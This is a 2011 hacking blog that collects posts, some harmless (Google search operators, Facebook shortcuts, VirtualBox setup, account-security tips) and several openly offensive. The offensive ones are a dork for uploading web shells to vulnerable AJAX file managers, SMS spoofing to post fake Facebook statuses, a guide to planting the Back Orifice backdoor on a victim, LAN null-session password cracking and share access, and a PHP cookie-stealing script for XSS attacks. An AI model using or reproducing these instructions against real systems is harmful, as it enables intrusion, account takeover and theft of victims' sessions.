Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects


Write at HWS !!!

Guest Posting

How secure is your Computer ?

Check out your computer safety here . A lot of tools , tricks and hacks related to computer .

Blogger Tips and Tricks

A Lot of tips ,tricks and hacks related to blogger . Seo tricks to get maximum targetted traffic to your blog.

Easy ways to Earn Online

Online earning is not so difficult but it needs a lot of patience and hardwork. Here are some techniques to earn money through internet.

Facebook Tricks

A lot of facebook tips , tricks and hacks.It requires a lot of time but reading is must.

Pro Hacking

If you have knowledge about basic techniques then try this,but be careful as it is highly toxic.

Thursday, December 29, 2011

Few Google Tricks for Begineers

A few things you might want to try with Google:
Hand type the following prefixes and note their utility:





 
 
  • link:url Shows other pages with links to that url. 
  • related:url same as "what's related" on serps.
  • site:domain restricts search results to the given domain.
  • allinurl: shows only pages with all terms in the url.
  • inurl: like allinurl, but only for the next query word.
  • allintitle: shows only results with terms in title.
  • intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.
  • cache:url will show the Google version of the passed url.
  • info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
  • spell: will spell check your query and search for it.
  • stocks: will lookup the search query in a stock index.
  • filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.
  • daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.
  • maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.
  • phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)
  • site:www.somesite.net "+www.somesite.+net"
  • (tells you how many pages of your site are indexed by google)
  • allintext: searches only within text of pages, but not in the links or page title
  • allinlinks: searches only within links, not text or title.

Sunday, December 25, 2011

New Facebook Chat Smileys

  • [[171108522930776]] Troll Face 
  • [[164413893600463]] MEGUSTA 
  • [[218595638164996]] YAO 
  • [[189637151067601]] Lol 
  • [[129627277060203]] Poker face. 
  • [[227644903931785]] Forever ALONE. 
  • [[100002752520227]] OKAY 
  • [[105387672833401]] F**K YEA. 
  • [[100002727365206]] CH AC. 
  • [[125038607580286]] Forever alone navidad. 
  • [[143220739082110]] FK KIDDING ME. 
  • [[168040846586189]] Feel like a Sir. 
  • [[169919399735055]] NOT BAD 
  • [[142670085793927]] M O G. 
  • [[170815706323196]] Cereal Guy 
  • [[167359756658519]] NO 
  • [[224812970902314]] Derp 
  • [[192644604154319]] Derpina

Saturday, December 24, 2011

Must know things in HACKING


Hey guys , how you doing ? hope everything is alryt ! :)
Well some of my friends like ujjwal ;-) asked me about port numbers , IPs , and all those basics . So i thought it would be good if  i post a tutorial on these things .
I'll be explaining these things in brief .

INTRO


So here i start . I'll be explaining about IPs , Port numbers , port scanners , IP scanners , whois and archive.org in brief .
Because in network or web-hacking these are most fundamental and most essential information you are gonna use .


IP


IP is short form of Internet Protocol. Like we all have unique address and u can say phone numbers , every computer connected to any network , that might be internet or any private network , must have its own unique IP.

We track any computer through its IP only . There are two types of IP
  • Static ip - these types of IPs are generally assigned to organizations , like your college or university may have static IP.
  • Dynamic IP - these type of IP are assigned to private users like us . Dynamic IPs keep on changing.
To know about how to find IP of anyone check my tutorial on How to know the IP of your friend .


Port numbers

Port numbers are virtual ports on your computer on which different services are running . like when you browse internet , http - protocol for website browsing , uses port 80 .
When hacking a particular computer on any network , after IP address , port number is the most important thing you need to know . If our desired port is opened , we can exploit that according to our choice . Ports can be closed using firewalls.

Suppose someone says that some website's FTP password is this . now what he mean is , FTP : file transfer protocol , by which you can manage your files on a server via any ftp client , or via your command prompt or terminal , can be used using this password.
Now you must know how to use ftp via your command window. you use ftp command in both linux and window to get it done here is an example :
ftp www..com (23) //23 is optional as default port for ftp is 23

IP and Port scanners


There are lot of tools to know the computers which are connected to a particular network by scanning the network by any of these tools. You just have to give the IP range you want to scan for. I am listing some of the scanners below , these scanners shows you open PORTS too.
  • Angry IP scanner
  • LAN scanner
  • Advanced IP scanner
Just google them to download .


whois


First step in  a mannered website hacking is footprinting or information gathering.
whois is a very popular service used by hackers to get information about whatever website they going to hack.
How to use whois:
simple, just search google for whois , then go to any site and enter the website address there. It will show you details of the website . some usefull links are :
  • http://www.whois.com/
  • http://who.is/
  • http://www.whois.net/


archive.org


This is fun :) .
Go to www.archive.org and put any website address there and then click on TAKE ME BACK button . It will show you the history of that site , like when it was published and the dates when it was modified , how it looked back then. this is also a very good step in footprinting .

Guys plz comment and share and like .... thanks
Stay Tuned !!!!


Copyright © 2011. All rights reserved by “Kumar Sourav" & "xeo hacker"




Tuesday, December 20, 2011

Setup a LAN on your virtual box with video


LAN on your PC


hey guys how u been ? hope everything's fine.

anyway what if you want to experiment or check some attacks and you dont have 2 computers ... well you can use virtual box to setup a lan there :D
its great. give it a try :)


VIDEO


guys like and subscribe the videos plz !



command used


ifconfig eth0 192.168.1.2 netmask 255.255.255.0

Guys plz comment and share and like .... thanks
Stay Tuned !!!!



Copyright © 2011. All rights reserved by “Kumar Sourav" & "xeo hacker"

Wednesday, December 14, 2011

Vulnerability in Ajax File Manager - Upload Shell

AJAX is about updating parts of a web page, without reloading the whole page.



 
  •  First of all open Google Search Engine.
  • Now type this google dork in it inurl:/plugins/ajaxfilemanager/ 
  • Now hit Search and open any website shown in the result.
  • Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url.
  • It will look like as below :
  • Now Find Upload and Upload Your shell/Deface/file 
  • To view you File find /Uploaded/ directory in Website by using your brain.

Sunday, December 11, 2011

How to increase Facebook page likes - G+ ones - Twitter Followers

How to Change Status Of Someone's Facebook Account

Most of us know that Facebook allows us to update our status using our mobile phone. This feature is called Facebook Text. If you have Facebook Text enabled, you have to just type in the status and send this message to “923223265? using your registered mobile phone. Facebook will automatically update your status.
IMPORTANT!! :The slave MUST have the Facebook Text feature enabled in their account , if they don't then this will not work

So, in this Facebook hack, we will use SMSGlobal to change the status of your friend. SMSGlobal allows us to send message to any number from anyone’s number. That is, we will send Facebook a fake SMS from your friend’s registered mobile number.

Facebook will think that the message has been sent by your friend and his status will be updated according to the message contents sent by us.

  • Go to SMSGlobal.com and register for an account. 
  • After logging in to your account, click on “Send SMS to a Number”
  • Enter the information as follows:
Send SMS To: 919232232665
Sender ID From: The registered mobile number of your friend.
Message: The status you want to update for your friend. Enter anything you want. It will appear as your friend’s new status.
  • Hit on Send SMS. 
  • Now, Facebook will update your friend’s status to the message you have sent.

Saturday, December 10, 2011

What is Backdoor ? How to use Backdoor

Using backdoor, hackers can remotely access your computer without any Authentication and do whatever the hacker wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :




  • Work as a key logger.
  • Send any Information from Victim’s PC to the Hacker’s PC.
  • Run any program on the Victims PC.
  • Display any Violating Image on victim’s Screen.
  • Open the CD Drive of the Victim’s PC.
  • Open any Web page on the Victims Screen.
  • Disable any Specific Key or whole Keyboard.
  • Shutdown Victim’s PC.
  • Start a Song on the Victim’s PC.etc.etc…………..
The best backtrack I found is Back Orifice so I am going to discuss it.

Back Orifice

Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.
  • Basics Back Orifice consist of 2 main parts. The "client" and the "server". 
  • The client is the part of Bo2k that you use to control the other party's comp. By defult, it's bo2kgui.exe 
  • The server is the file you install in the other party's comp in order to control it. By defult, it's bo2k.exe. 
  • Never ever run bo2k.exe on your own comp unless you know what you are doing. 
  • Another ipmortant component is plugins. To put it simply, Plugins are addon for Bo2k. They enhance the power of Bo2k.
  • For a list of plugins for Bo2k, goto the Bo2k official Site. 
  • In order to control the other party's comp, you must first sent the bo2k sever to the other party, and once the other party runs it, you just start your bo2k client and using it you can assert your control. 

How to use Back Orifice ?

How to use it? First you must configure both the client and the server. First let's configure the server.
  • Download a copy of Bo2k and unzip it. 
  • Then run the file bo2kcfg.exe. 
  • A window will appear welcoming you to the bo2k configuration wizard.
  • Click on next (For those experts, they don't use the wizard, they configure it manually.But one thing at a time first.) 
  • Then the wizard will ask you for the bo2k server file(that's bo2k.exe). 
  • By defult you just need to click next. However if you rename it or kept it in another folder, go browse for it. 
  • Now it will ask you if you want TCPIO connection or UDPIO Connection. I would recommand TCPIO. 
  • Now they will ask you what port you want it to listen to. More popular ones are 6666, 54321, 33137, 31336 and 4444. Try to advoid these. Try putting a number that you can remember easily. Avoid 12345, 1080, 8808. 
  • Now they will ask you for your encryption type. Usually you get only to choose the XOR option. Do not choose 3DES if you are not in US. 
  • Now they will ask you what password you want to use.Choose one and remember it. 
  • Then click finished. The wizard will auto config the Client part for you. Be patient you can use it soon.
  • Now sent the server part(bo2k.exe ) to the other party and when the other party runs it, you will be able to connect to it. 

What to do when victim clicks on server ?

  • Start bo2kgui.exe. 
  • Click on file, then new server. 
  • Type what ever name you want to call it. 
  • Now type the ip address of the other party. If you don't know it,then you are out of luck. 
  • If the other party is on irc, just goto irc and type /dns and you will get the ip (plz dun include the <> when typing /dns). 
  • Now click on connect. You should see a window saying "Retriving server capability. Please wait.."
  • However if you see "Cannot connect to Remote server" that means the other party either did not run the Bo2k.exe or he is behind a firewall or maybe he has gone offline. Then you are out of luck. :) 
  • One you have connnect, on the right window you should see some folders. I will explain the functions inside the folder in the next post .

Download Back Orifice 2000

  • Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/

How do I delete Back orifice 2000

Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.
  • Click Start> Run, and type “Regedit”(without the quotes)
  • Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
  • Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
  • Right-click on this entry and click Remove. Now restart your computer.
  • After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
  • Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
  • Exit Windows Explorer and reboot again
NOTE : Only for educational purposes and If I got good response on it ,I will furthur explain the functions of folder and also how to add plugins in it.So give your comments if you like it !!!

Underscores vs dashes in URLs - Which is Better?

The best thing I love about webmaster team is Matt Cutts video tutorials. He discusses SEO Tips and removes misconceptions and myths being wrongly propagated by several SEO agencies. I am proud of Google's great customer service.  We all write post titles daily and these titles are responsible for driving most of the traffic from search engines. People often don't realize that every single character in the title has its own significance. Titles that are called the king are only those which are highly optimized in terms of keyword choice, word limit and use of Special Characters that we will be discussing today.

What is an optimized title?

Any title which has these features:
  • Title containing no more than 66 Characters.Use one liners
  • Title containing simple daily used English words. You don't need to use complex Vocabulary and no need to consult a Thesaurus for writing titles. Just apply the rule of KISS (Keep it simple Stupid). Average internet user always go for words that sound familiar in search results page.
  • Select choice of words from Google Keyword Tool. Ignore word Tracker
  • You can use the following symbols frequently:     -  :   !  ?     
  • Use the following symbols rarely:  . &  %  # |
  • Never use the long Dash or Underscore i.e.  _     

Lets See What Google Says

Matt Cutts from webmaster help suggests that Underscores should always be avoided because Underscores are normally used by programmers while writing algorithms and is often misinterpreted by search robots. He suggested that dashes are much better to act as separators. Lets see what else he said:

Thursday, December 8, 2011

How to Download Any Torrent File With IDM

Downloading files from the Torrents site is easy and its legal (unless you are downloading copyrighted files). But the downloading speed from torrents depends upon many factors like seeders, leechers, internet connection etc. So if you have high speed internet connection still it happens sometimes that you are not getting good downloading speeds.Here is the solution for this problem, you can use IDM to download them.There are many methods on the internet to do this but this is the easiest, simplest and tested method, which I come to know just 2 minutes before by one of the member of our Facebook group named Rahul Ramachandran .

How to Download Torrent Files with IDM:

  • First of all,Search and Download the torrent file (.torrent) of your desired file from any site,like I am using Torrentz .
  •   After downloading the file, go to Torcache and browse the downloaded torrent file and then click on the cache button.
  • This will generate a new link for your torrent file.
  • Now just copy that new link from the opened window as shown in below image.
  • Now go to the Torrific and create a free account there if you don't have already and log in your account. 
  • In the text field paste the address of the new torrent file obtained in 4th step ( also shown in above image ) and click on "Get" button.
  • After clicking the GET button ,you will get the list of available files that are present in that torrent file.
  • Now Click on initiate bittorrent transmission button.
 
  • This will give the full option to download all the available files. Just click on any link and you can see the download manager IDM popping out for downloading the file.
  • Now enjoy the ultimate Speed of IDM for downloading torrents too.
  • Now Start Downloading your file.
NOTE : The maximum limit is 100 MB per file,you cant download the files above 100MB.Secondly, You should use this method only if you are getting very poor speed with your torrent client because if you download it with IDM the link will not be resumable and you have to finish it without breaking your internet connection.

Tuesday, December 6, 2011

Latest Shortcut Keys for Facebook

If you spend a lot of time on Facebook as we know we all do then why not spend this time more efficiently and quickly.There are some keyboard shortcuts for Facebook which are specific to browser.Using these shortcuts you can easily create new messages,view account settings,View notifications etc .In the beginning its a little difficult to use them but once you get familiar with these shortcuts then you will really feel easy to navigate on facebook.So today I will share some Facebook shortcut keys with you guys for Google Chrome, Firefox and Internet Explorer.There is also a trick to create custom shortcuts keys for your computer programs.

Here is a comprehensive list of Facebook Shortcuts for each browser.

Google Chrome Facebook Shortcuts

  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.
  • Alt+?: Search
  • Alt+m: Compose a new message

Firefox Facebook Shortcuts

If you are using Firefox browser then you also need to press SHIFT along with the above shortcut keys.

  • Shift+Alt+1: View your News Feed
  • Shift+Alt+2: View your own Profile
  • Shift+Alt+3: View pop-up of friend requests
  • Shift+Alt+4: View pop-up of messages
  • Shift+Alt+5: View pop-up of notifications
  • Shift+Alt+6: View Account Settings
  • Shift+Alt+7: View Privacy Settings
  • Shift+Alt+8: View Facebook’s own profile
  • Shift+Alt+9: Read latest Terms of Service agreement.
  • Shift+Alt+0: Open Facebook Help Center
  • Shift+Alt+?: Search
  • Shift+Alt+m: Compose a new message
NOTE : If you are using Internet Explorer then you you can use the Facebook shortcuts of Google chrome but you have to press ENTER after each shortcut .

Friday, December 2, 2011

Hack your desired PC on LAN

As I have told in my previous post Simple Commands for LAN Hacking for Beginners that these days I am working on LAN Hacking so guys here is my new post in this respect .Hope you guys love it .Dont forget to Change your IP Address if you want to remain safe but its not compulsary.Through this technique you will be able to hack your desired PC on LAN .

This technique will be taking advantage of Port 139.Most of the time,Port 139 will be opened.But if unfortunately your victim's Port 139 is filtered or closed then you can't hack him by this method .So guys follow these steps carefully and at the end you will be able to hack Lan computers.
NOTE : All the tools used in this tutorial have already been sent to all the Email subscribers to their emails,but if someone didn't got it then post your email in the comments and if we find that email in subscription list we will send you all the tools.

Steps to Follow

  • First of all,I will do a port scanning at the target computer which is 192.168.40.128.This computer is inside my LAN network. 
  • Scan it using Nmap, this is actually for checking either its port is opened or closed.
  • I get the result and it shows Port 139 is opened up for me. 
  • Now we will need both of these tools:
  1. USER2SID & SID2USER
  2. NetBios Auditing Tool
  • I have already sent these tools to all the Email Subscribers.
  • After you get both of them,put them in the C: directory.
  • Now you need to create a null session to the target computer.For this open cmd prompt and write this below command as it is as shown in image below :
  • Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER. 
  • We will first using USER2SID to get the ID.Just follow all the codes same as shown in below image ,just replace the IP Address of victim
  • We will test against the Guest account because Guest account is a built in account. 
  • After we get the ID,we need to do some modification on the ID.
  • We take the ID we get from the guest account and modified it become "5 21 861567501 1383384898 839522115 500".
  • Please leave out the S-1-,leave out all the - too.
  • Now you will see that you get the username of the Administrator account.
  • In this case,the Administrator account is Administrator.

MAIN PART

  • Now we are going to crack the Administrator account for the password in order to access to the target computer. 
  • First of all,extract the NetBios Auditing Tool in C directory, which you have received in your email.
  • Now open cmd prompt and write the below code as it is :
  • Press on enter and the tool will run and finally you will crack the password.

  • In this case,I have get the password. 
  • In order to proof that I can get access to the target computer using this password.
  • After you press enter,it will prompt you for the username and password.
  • Therefore,just input them inside the prompt and continue.

  • Target C drive will be on your screen.You are done ....

Prevention

  • In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 13.

Tuesday, November 29, 2011

Change your IP in less than 30 seconds

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked :




  • Click on "Start" in the bottom left hand corner of screen.
  •  Click on "Run"
  • Type in "command" and hit ok.
  • You should now be at an MSDOS prompt screen.
  • Type "ipconfig /release" just like that, and hit "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"
NOTE : You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
  • Right click on "Local Area Connection" and click "properties" 
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Hit the "Ok" button here
  • Hit the "Ok" button again
NOTE : You should now be back to the "Local Area Connection" screen.
  • Right-click back on "Local Area Connection" and go to properties again. 
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Hit "Ok"
  • Hit "Ok" again
  • You now have a new IP address
NOTE : This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.

Simple Commands for LAN Hacking for beginners

I am sure many guys know all these commands.I am just gonna start on LAN Hacking so I am starting from basics.These commands are for beginners.These commands will run on CMD prompt.



 
  • First of all, open your Network Connection.
  • Now right click and select Properties. 
  • Then Select TCP/IP and click on Properties again. 
  • Click on Advanced and WINS tab. 
  • Here select Default for NeBIOS.
  • Now come back to the main window named Local Area Connection.
  • Now select File and Print Sharing for Microsoft Networks and hit enter.
NOTE : This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don’t know how to get CMD open in your box, then click on Start, then Run, then type “cmd”.

Codes

  • nslookup
  • net view
  • net use
  • net user
  • ping
  • tracert
  • arp
  • route
  • nbtstat
  • netstat
  • ipconfig
In case you don’t know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

1) Ping

  • This command will allow you to know if the host you pinging is alive, which means if it is up at the time of executing the “ping” command.
CODE :
  • ping x.x.x.x (x is the IP address).
  • ping www.whatever.com (www.whatever.com is the website you want to ping, but you don’t know the IP)
NOTE : Keep in mind that if the host you pinging is blocking ICMP packets, then the result will be host down.

2) Nslookup

  • This command is mostly for resolving DNS into IP.
Lets say you know the website URL but you don’t know its IP(and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website you want to find out the IP)
Now, another really nice function of nslookup is to find out IP of specific Mail Severs.

CODE :
  • nslookup (enter)
  • set type=mx (enter)
  • yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP.
  • Now why would you want to have an IP of a mail server?
  • To send spoofed mail to your friends or even for SE.
  • In case you looking for “How to spoof email”, then look for my “How to spoof email tutorial” http://www.infowar.com/forums/showthread.p…p;threadid=2360

3) Tracert

This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.

CODE :
  • tracert x.x.x.x (x is the IP address)
  • tracert www.whatever.com (www.whatever.com is the website you don’t know the IP)

4) Arp

This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

CODE :

arp -a
  • Route 
This command will show you the routing table, gateway, interface and metric.

CODE :
  • route print

5) Ipconfig

This command will show tons of very helpful things.Your IP, gateway, dns in use.

CODE :
  • ipconfig
  • ipconfig /all
This command will give all that info but for all networks you might have it.Also, in case you have a dynamic IP and want to change it, then type.
  • ipconfig /release (this will release your IP)
  • ipconfig /renew (this will renew your iP)
NOTE : Keep in mind that those commands will change your IP, but the new IP will still be tighed up to you. So don’t do anything stupid.

6) Netstat

This command will show you connection to your box.

CODE :
  • netstat
  • netstat -a (this will show you all the listening ports and connection with DNS names)
  • netstat -n (this will show you all the open connection with IP addresses)
  • netstat -an (this will combined both of the above)

7) Nbtstat

This command will show you the netbios name of the target box.

CODE :
  • nbtstat -A x.x.x.x (x is the IP address)
  • nbtstat -a computername
  • net view x.x.x.x or computername (will list the available sharing folders on the target box)
  • net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target box as administrator)
  • Now if you want to connect to the target box and browse the entire C drive, then use this command: net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
NOTE : Keep in mind that this will only works if the target box doesn’t have an administrator password set.
And least but not last, the “help” command.
  • whatevercommand /help
  • whatevercommand /?
This command will help you to understand what it does and all the switchs available for each command.
Very useful if you know the command, but forgot the right switch.

Saturday, November 26, 2011

Batch File To Start Program In Start up of Computer

Whenever I start my computer it is usually so in the beginning I have to start the same program, which in my case is FrontPage. I update my webpage everyday so I decided to get rid of this thing so I created a batch file to start this program automatically at start up so it is always ready for me to useand no need to run it manually.

Batch File to Start Desired Programs on Start up of Computer

  1. First of all open notepad. It is located at Start Menu >> All Programs >> Accessories >> Notepad (Windows XP)
  2. Then type start frontpg.exe
  3. Now click on save as and save this file with .bat filename extension. I have called mine startup.bat
  4. Now you can double click on it on the desktop to test if it opens FrontPage.
  5. Now Right click on the Start Menu.
  6. Now open the Programs folder, then The Startup Folder.
  7. Paste your file in the Startup folder.
  8. Now whenever you start your computer, your program will automatically start for you. You do not even have to click on the batch file to start your program.
You can start any exe file with this simple little batch file. An exe file is an executable file that usually starts a program. Here are some variations of the simple batch file.
  • start /min frontpg.exe
  • start /min iexplorer.exe
  • start /min notepad.exe
  • start /min iexplorer.exe
  • start /min msimn.exe

Notes:

  • /min = When the program opens it is minimized in the task bar
  • /max = When the program opens it will be maximized and open on your screen Also writing nothing does the same thing.
  • winword.exe Microsoft words .exe filename.
  • msimn.exe Opens Outlook Express.
  • Leave your batch file on your desktop You can just press on it yourself to start all your programs. It starts them so quick!!!   I would rather do it this way. It is even quicker than pressing on the icon on the desktop…Don’t ask me why.
  • You can also drop a shortcut to a program into the startup folder and it should do the same thing.. Give it a try
  • start /min 10.0.0.1  This will take you to a network computer. You need to replace the IP address with the address of the computer you want to connect to. You can also put a server name or computer name as long as it is on the network.

Friday, November 25, 2011

How to Secure your Faceboook Account from Hackers

Facebook is the top social networking site in the world now, where most of us has at least an account (about 30% has more than one account) associated with it. Facebook is a great way to have fun using their fan pages or groups etc.It also has games and much more stuff but the question is how to secure Facebook as the ratio of Facebook hacking is increasing day by day.
Facebook has provided us a lot of ways to secure accounts but usually people don't give attention to it. If you have never touched any part of Facebook security, here I am gonna post five quick tips to get your Facebook secured.

1. Create a strong password for authentication

Passwords can be easily broken by brute-force technique,in which user use some software etc to crack your password, if you choose to use a short and simple password. If you don’t have a strong and alphanumeric password for your account, then whatever security guides that you apply below is not going to do any better,so first of all make your password strong.For this add symbols like these !@#$%^&* in your password and also add numbers in it. Your password must be a combination of lower case, upper case, numeric and special characters like symbols I have above mentioned.

2. Enable secure HTTPS connection

HTTP connection is totally outdated,its very easy to hack HTTP connection as it is extremely vulnerable to man in the middle attack. So to avoid this, Facebook offers the HTTPS connection which is a secured one and very difficult to hack.In HTTPS all the data you entered from your computer and sent to Facebook server is completely encrypted. Even if there is a man in the middle who taps your connection,he will get nothing.

3. Enable login notification with Mobile

If you enable the log in notification,it will send you message on your mobile whenever someone tries to log in from your account . So when you get this message that someone is using your Facebook account without your permission (means he hacked your account), you can immediately kick them out and call for a new password so that he can never login anymore. This feature is very good and you can enable notifications from both email and mobile SMS.
NOTE : I will recommend to use mobile notification ,so that you are warned immediately after the unknown access to your account.

4. One Time Password in login approval

One Time Password is a 2 factor authentication technique in which you enable all logins from unknown devices to use One Time Password.In this method whenever someone tries to log in to your account from unknown device a code comes to your mobile,without entering that code ,the hacker wont be able to access your account. In this way,you can easily ensure that only you can login from an unknown device.With the use of this method, there are only 2 ways for the hacker to use your Facebook identity. One is to get access to your recognized device which in most cases is your computer or smartphone. The other way is to get access to your mobile phone and then he will easily get the one time password.

5. Logging out from Facebook

Whenever most people are done with Facebook i.e checking and replying messages and notifications, they won't log out their Facebook account and just close the web browser and simply walk away from the computer,actually they assume that the session is logged out. This is a really big mistake as not all the web browsers works the same. Some still retain your previous session, in other words your cookies even though the web browser is closed. Always remember to log out after completing your tasks.

Thursday, November 24, 2011

Install BackTrack 5 on virtual box with video

Hey guys .. how u been ???
Well in this post i wanted to show you how to install BT on virtualbox ... i thought it will be more easy to explain with video , isnt it ?
So here is the video... do comments and likes :D

VIDEO


You can see the video HERE.

 

Hope you enjoyed this !
Stay Tuned !!!

Thank you



Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Wednesday, November 23, 2011

Love of fans for Hack With Style (HWS)

I always appreciate the love of our fans for this blog (HWS). As it really because of you guys that this blog got so much popularity within such a short period of time and got a good page rank in almost all page ranking sites and its popularity is increasing day by day. I am extremely thankful to all of my readers for their continuous support, love and dearest motivation. Verily I could not have achieved this success without the active participation and support of our readers .

The purpose of this post is to just appreciate the efforts of our fans,who has given their time to create banners for HWS , and I also want to show  their efforts to others ,a way of thanks from HWS team ... :))

Banners Designed by Aleem Hafeez

Banner 1

 Banner 2
  • These Banners are designed by Aleem Hafeez . We are very thankful to him for giving time to make such beautiful banners.

Banners Designed by Bajpan Gosh

 Banner 3
  • The above Banner is designed by Bajpan Gosh . We are very thankful to him for giving time to make such beautiful banners.

 Banners Designed by Ghosts Rider

Banner 4
  • The above Banner is designed by Ghosts Rider . We are very thankful to him for giving time to make such beautiful banners.

Banners Designed by Kumar Sourav


Banner 5
  • Finally our respected admin Kumar Sourav . A beautiful and colorful banner designed by Kumar Sourav.... :))

Which Banner is best ??

  • Now I am really confused as all the banners are really attractive and have all attributes to be in the header of HWS. 
  • So guys I need your votes,please tell me which one you like the most and the banner which got the maximum votes ,I will add that banner in the header of HWS.
NOTE : Poll closed and you can check the winner in header .... :))

Tuesday, November 22, 2011

BackTrack 5 : Install VirtualBox

Hey guys .. how are you ???
anyway u knw virtualbox right ? For those who doesnt know wat is virtual box... read following

What is virtual-box


Virtualbox is a software , distributed by Oracle , which is used to simulate multiple operating systems that is guests OSs in your main OS that is host OS.
Using this software , u can use any operating system within your main OS that may be backtrack or any other OS.


Where to download virtual-box


You can download virtual-box HERE.
If you are using BT then go to virtual box for linux host ( an option there )  , then select your platform and then download.


How to install


Now that you have downloaded its time to install. follow these steps :
  • Nevigate to download folder by using "cd" command.
  • Now use the command below to install it ( it must be .deb file)
    sudo dpkg -i filename.deb 
    Now you are done ...
Hope you enjoyed this !
Stay Tuned !!!

Thank you

Copyright © 2011. All rights reserved by “Kumar Sourav" and "xeo hacker"

Monday, November 21, 2011

Splitting the Cookie Catcher Code Line by Line for Understanding

Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

  • This is the same code as I have posted in previous tutorial.
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.
<?php
Write the Code Here
?>
  • These two code lines tell the server that the code written inside them is php code.
  • First line is the starting line of code and and the second tells about its end and the code comes within these lines.
$cookie = $_GET['cookie'];
  • This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
  • REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.
$date=date(“j F, Y, g:i a”);
  • Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.
$referer=$_SERVER['HTTP_REFERER'];
  • HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.
$fp = fopen('cookies.html' 'a');
  •  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);
  • In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
  • It writes the Cookie ,Date and Time and Website in the opened file cookies.html .
fclose($fp);
  • After writing all the data in cookies.html ,this code finally close the file.
header ("javascript:history.back()");
  • This final line of code sends the user back to the last page fro where he clicked on your link.
  • This code is very useful as victim has no idea that his cookies are captured.
That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .
NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

